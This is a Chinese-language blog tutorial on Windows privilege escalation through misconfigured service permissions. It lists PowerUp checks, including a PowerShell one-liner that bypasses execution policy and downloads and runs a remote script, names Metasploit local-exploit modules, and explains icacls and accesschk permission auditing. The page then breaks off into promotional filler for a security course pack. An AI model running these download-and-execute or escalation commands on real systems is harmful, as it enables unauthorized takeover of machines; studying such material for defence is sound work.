内网攻防-权限提升-Windows-系统配置错误提权!网络安全零基础入门到精通教程!

本文仅用于技术研究学习,请遵守相关法律,禁止使用本文所提及的相关技术开展非法攻击行为,由于传播、利用本文所提供的信息而造成任何不良后果及损失,与本账号及作者无关。

01简介

在 Windows 系统中,系统服务文件会在操作系统启动时加载和运行,并在后台调用可执行文件理论上,低权限用户是没有对高权限服务调用的可执行文件具有写权限。

但是,如果因为管理员的错误配置,导致一个低权限的用户对此类系统服务调用的可执行文件具有 写入权限那么低权限用户就可以把该文件替换成任意执行文件,这样就可以劫持系统服务,获取该系统服务的权限而 Windows 服务通常是以 system 权限启动运行的,所以低权限用户可以通过此漏洞获取系统权限。

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术(网络安全)电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

02PowerUp 脚本检测

# 本地加载,检测可利用提权方式

import-Module .PowerUp.ps1  
Invoke-AllChecks  
powershell.exe -exec bypass -Command "& {Import-Module .PowerUp.ps1;InvokeAllChecks}"

# 远程加载,检测可利用提权方式

powershell -nop -exec bypass -c "IEX (New-Object  
Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellE  
mpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks"

# 使用检测到的提权脚本进行提权

powershell -exec bypass -c "IEX (New-Object  
Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellE  
mpire/PowerTools/master/PowerUp/PowerUp.ps1'); <利用语句>"

03MSF 模块检测

# 检测高权限服务替换

exploit/windows/local/service_permissions  
# 检测高权限服务路径

# 检测高权限服务路径

exploit/windows/local/unquoted_service_path  
set AutoRunScript migrate -f

# 检测注册表键 AlwaysInstallElevated 提权

exploit/windows/local/always_install_elevated  
# 检测自动安装配置文件

# 检测自动安装配置文件

post/windows/gather/enum_unattend

04icacls 命令检测

在 Windows 系统中,可以通过 icacls 命令查看特定目录的权限情况

icacls 命令

/T:显示指定目录下的所有子目录  
/Q:禁止显示成功的消息  
/L:指定目录为快捷方式  
/C:显示错误消息并继续执行

icacls 继承

(OI):对象继承  
(CI):容器继承  
(IO):仅继承  
(NP):不传播继承  
(I):从父容器继承的权限

icacls 简单权限

N:无访问权限  
F:完全访问权限  
M:修改权限  
RX:读取和执行权限  
R:只读权限  
W:只写权限  
D:删除权限

icacls 特定权限

DE:删除  
RC:读取控制  
WDAC:写入 DAC  
WO:写入所有者

S:同步

AS:访问系统安全性  
MA:允许的最大值  
GR:一般性读取  
GW:一般性写入  
GE:一般性执行  
GA:全为一般性  
RD:读取数据/列出目录  
WD:写入数据/添加文件  
AD:附加数据/添加子目录  
REA:读取扩展属性  
WEA:写入扩展属性  
X:执行/遍历  
DC:删除子项  
RA:读取属性  
WA:写入属性

查看 test 目录的权限信息

icacls F:test

05accesschk 工具检测

https://learn.microsoft.com/zh-cn/sysinternals/downloads/accesschk

在 Windows 中,可以使用 accesschk 工具检测特定用户/组对资源具有哪些权限

accesschk 的命令参数如下 :

-c:指定 Windows 服务,可以使用通配符 * 显示所有服务  
-k:指定注册表项  
-h:指定共享文件,可以使用通配符 * 显示所有共享  
-p:指定进程名和 PID,可以使用通配符 * 显示所有进程  
-f:当 -p 存在时,显示令牌详细信息  
-e:显示 Vista 上具有显式完整性级别的所有文件  
-d:显示顶级目录  
-s:显示递归目录  
-n:显示没有访问权限的文件  
-r:显示具有读取权限的文件  
-w:显示具有写入权限的文件  
-u:不显示错误  
-v:显示详细信息

在回显中,读取权限表示 R,写入权限表示 W

# 显示特定目录的权限情况

accesschk -dv "F:test"

# 显示 test 用户对特定目录的权限情况

accesschk "test" -dv "F:test"

# 显示具有写入权限的服务

accesschk -cw *

# 显示具有写入权限的进程

accesschk -pw *

# 查看特定注册表的权限情况

accesschk -k hklmsoftware

06高权限服务替换提权

在 Windows 中,如果我们找到当前用户具有完全控制权限的服务,那么就可以通过替换服务的可执行程序,获取该服务的权限。

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取

👉1.成长路线图&学习规划👈

要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

在这里插入图片描述
在这里插入图片描述

👉2.网安入门到进阶视频教程👈

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程扫描领取哈)
在这里插入图片描述
在这里插入图片描述

👉3.SRC&黑客文档👈

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:
在这里插入图片描述
黑客资料由于是敏感资源,这里不能直接展示哦! (全套教程扫描领取哈)

👉4.护网行动资料👈

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
在这里插入图片描述

👉5.黑客必读书单👈

在这里插入图片描述

👉6.网络安全岗面试题合集👈

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
在这里插入图片描述

所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值